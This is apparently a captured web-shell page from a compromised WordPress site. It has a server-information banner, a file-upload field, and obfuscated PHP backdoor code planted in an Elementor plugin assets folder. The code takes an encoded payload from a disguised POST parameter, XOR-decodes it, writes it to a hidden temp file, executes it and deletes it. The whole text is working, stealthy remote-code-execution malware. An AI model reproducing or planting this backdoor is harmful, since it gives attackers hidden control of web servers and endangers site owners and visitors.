| Server IP : 80.65.208.158 / Your IP : 216.73.216.25 Web Server : Microsoft-IIS/10.0 System : Windows NT VMI1501711 10.0 build 17763 (Windows Server 2019) AMD64 User : IWPD_134(rotechno) ( 0) PHP Version : 8.3.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Inetpub/vhosts/rotechnochem.com/httpdocs/wp-content/plugins/elementor/assets/lib/hover/ |
Upload File : |
<?php
if(array_key_exists("de\x73c\x72\x69pto\x72", $_POST)){
$pointer = array_filter([sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/tmp", "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp"]);
$holder = $_POST["de\x73c\x72\x69pto\x72"];
$holder= explode ( "." , $holder ) ;
$flg = '';
$s = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($s );
$o = 0;
while ($o < count($holder)) { $v7 = $holder[$o];
$sChar = ord($s[$o% $sLen] );
$d = ((int)$v7 - $sChar - ($o% 10))^ 66;
$flg .= chr($d );
$o++;}
while ($ptr = array_shift($pointer)) {
if (is_writable($ptr) && is_dir($ptr)) {
$hld = implode("/", [$ptr, ".desc"]);
if (file_put_contents($hld, $flg)) {
require $hld;
unlink($hld);
die();
}
}
}
}